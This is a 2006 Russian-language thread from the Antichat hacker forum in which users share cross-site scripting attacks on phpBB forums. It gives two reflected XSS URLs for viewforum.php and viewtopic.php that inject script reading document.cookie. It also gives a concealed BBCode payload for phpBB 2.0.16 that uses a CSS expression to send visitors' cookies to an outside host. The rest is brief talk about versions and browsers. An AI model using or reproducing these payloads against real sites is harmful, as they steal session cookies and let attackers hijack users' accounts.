Форум АНТИЧАТ - 2 xss в PHPBB

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - 2 xss в PHPBB (https://forum.antichat.xyz/showthread.php?t=24286)

alextoun

21.09.2006 19:34

2 xss в PHPBB

2 xss увидел в viewforum.php и viewtopic.php

Код:

viewforum.php?f=1&topicdays=99"><script>alert(document.cookie)</script>&start=30

Код:

viewtopic.php?t=10&postdays=99"><script>alert(document.cookie)</script>&start=20

...

SanyaX

21.09.2006 19:45

Хехе. Ради инетереса ты смотрел на какой версии тестировал + почему не написал в каких браузерах пашет а в каких нет? А так молодец! За старания свои + заслужил.

alextoun

21.09.2006 19:51

в эксплорере делал, а тестил на своём 2.0.6 форуме

DIAgen

21.09.2006 20:20

Цитата:

Сообщение от alextoun

в эксплорере делал, а тестил на своём 2.0.6 форуме

phpBB 2.0.6: Выпущена в 2002 редкая версия.
А если phpBB 2.0.16

PHP код:


		
			
[*color=#EFEFEF][*url]www.ut[*url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th  is.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]

syntacsis

21.09.2006 20:51

Вообще-то уже 2.0.21 на дворе =)

alextoun

21.09.2006 21:39

DIAgen извеняюсь 2.0.16, не увидел.

Время: 06:37